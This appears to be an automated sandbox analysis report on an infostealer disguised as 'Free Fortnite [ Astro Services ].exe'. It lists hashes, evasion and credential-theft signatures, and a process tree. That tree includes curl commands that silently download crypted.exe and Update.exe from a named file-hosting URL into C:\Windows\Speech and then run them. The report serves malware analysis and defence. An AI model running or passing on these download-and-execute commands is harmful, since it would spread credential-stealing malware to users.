Analysis

  • max time kernel
    24s
  • max time network
    24s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/06/2024, 20:07

Errors

Reason
Machine shutdown

General

  • Target

    Free Fortnite [ Astro Services ].exe

  • Size

    6.1MB

  • MD5

    5e43b3f629028f3f0fb373320e67f8f2

  • SHA1

    7a38ce7f6fbfdfa40d3301f35bf98a38591332de

  • SHA256

    cdc538c211494d264a6f1fb268a7058e1493baec68b2d34476fc0a300a60ebd7

  • SHA512

    dca1f077f0b25bf9cd26ac97170d41ab9c398dce9840060831914bdeae7523b6fc989144660d82fcd53a901f2e2d7dd8158c3ddd875b62733857cc4401330c7c

  • SSDEEP

    98304:MjqTgN3fokLXZwaFowjUeLMpHkjYtrCc14hOanzMSxjxfd4CLeJ5nLXOJ:Skc35LUyMijVzMSxjxn+iJ

Malware Config

Signatures

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 5 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Free Fortnite [ Astro Services ].exe
    "C:\Users\Admin\AppData\Local\Temp\Free Fortnite [ Astro Services ].exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of WriteProcessMemory
    PID:2324
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/crypted.exe --output C:\Windows\Speech\physmeme.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4804
      • C:\Windows\system32\curl.exe
        curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/crypted.exe --output C:\Windows\Speech\physmeme.exe
        3⤵
        • Drops file in Windows directory
        PID:3916
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Free Fortnite [ Astro Services ].exe" MD5 | find /i /v "md5" | find /i /v "certutil"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:116
      • C:\Windows\system32\certutil.exe
        certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Free Fortnite [ Astro Services ].exe" MD5
        3⤵
          PID:4076
        • C:\Windows\system32\find.exe
          find /i /v "md5"
          3⤵
            PID:4792
          • C:\Windows\system32\find.exe
            find /i /v "certutil"
            3⤵
              PID:392
          • C:\Windows\Speech\physmeme.exe
            "C:\Windows\Speech\physmeme.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:4132
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1996
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 276
              3⤵
              • Program crash
              PID:4412
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/Update.exe --output C:\Windows\Speech\Update.exe
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:428
            • C:\Windows\system32\curl.exe
              curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/Update.exe --output C:\Windows\Speech\Update.exe
              3⤵
              • Drops file in Windows directory
              PID:2920
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4132 -ip 4132
          1⤵
            PID:2448
          • C:\Windows\system32\LogonUI.exe
            "LogonUI.exe" /flags:0x4 /state0:0xa3956055 /state1:0x41c64e6d
            1⤵
            • Drops file in Windows directory
            • Modifies data under HKEY_USERS
            • Suspicious use of SetWindowsHookEx
            PID:2368

          Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Windows\Speech\physmeme.exe

                  Filesize

                  555KB

                  MD5

                  3588a3931a69ba3e6d8b0a437cb6033c

                  SHA1

                  e59a228fbd71b98c679476bfd851131f523c3a82

                  SHA256

                  b7e23d733d913b6def2d9b161ce70cb2fe89c8576e4912b9a316ddd58f2b5d10

                  SHA512

                  1cf75cf434f6c707a4f81704466ff09852f12649f7e328c4117c3eab5bc636502cd98d040015ab30ffe1d8aa6c714b49fb42129b4f26978ba2f1fdc4e533a1b0

                • memory/1996-12-0x00000000082E0000-0x00000000088F8000-memory.dmp

                  Filesize

                  6.1MB

                • memory/1996-16-0x0000000007F30000-0x0000000007F7C000-memory.dmp

                  Filesize

                  304KB

                • memory/1996-23-0x0000000009C20000-0x0000000009DE2000-memory.dmp

                  Filesize

                  1.8MB

                • memory/1996-24-0x000000000A320000-0x000000000A84C000-memory.dmp

                  Filesize

                  5.2MB

                • memory/1996-21-0x0000000008E40000-0x0000000008E5E000-memory.dmp

                  Filesize

                  120KB

                • memory/1996-8-0x0000000000400000-0x000000000045A000-memory.dmp

                  Filesize

                  360KB

                • memory/1996-9-0x00000000055B0000-0x0000000005B54000-memory.dmp

                  Filesize

                  5.6MB

                • memory/1996-10-0x0000000004F40000-0x0000000004FD2000-memory.dmp

                  Filesize

                  584KB

                • memory/1996-20-0x0000000008EC0000-0x0000000008F36000-memory.dmp

                  Filesize

                  472KB

                • memory/1996-19-0x00000000081C0000-0x0000000008226000-memory.dmp

                  Filesize

                  408KB

                • memory/1996-15-0x0000000007DC0000-0x0000000007DFC000-memory.dmp

                  Filesize

                  240KB

                • memory/1996-14-0x0000000007D60000-0x0000000007D72000-memory.dmp

                  Filesize

                  72KB

                • memory/1996-13-0x0000000007E20000-0x0000000007F2A000-memory.dmp

                  Filesize

                  1.0MB

                • memory/1996-11-0x0000000005100000-0x000000000510A000-memory.dmp

                  Filesize

                  40KB

                • memory/2324-1-0x0000000140000000-0x0000000140C38000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2324-0-0x0000000140000000-0x0000000140C38000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2324-2-0x0000000140000000-0x0000000140C38000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2324-3-0x0000000140000000-0x0000000140C38000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2324-25-0x0000000140000000-0x0000000140C38000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2324-4-0x00007FF816A50000-0x00007FF816A52000-memory.dmp

                  Filesize

                  8KB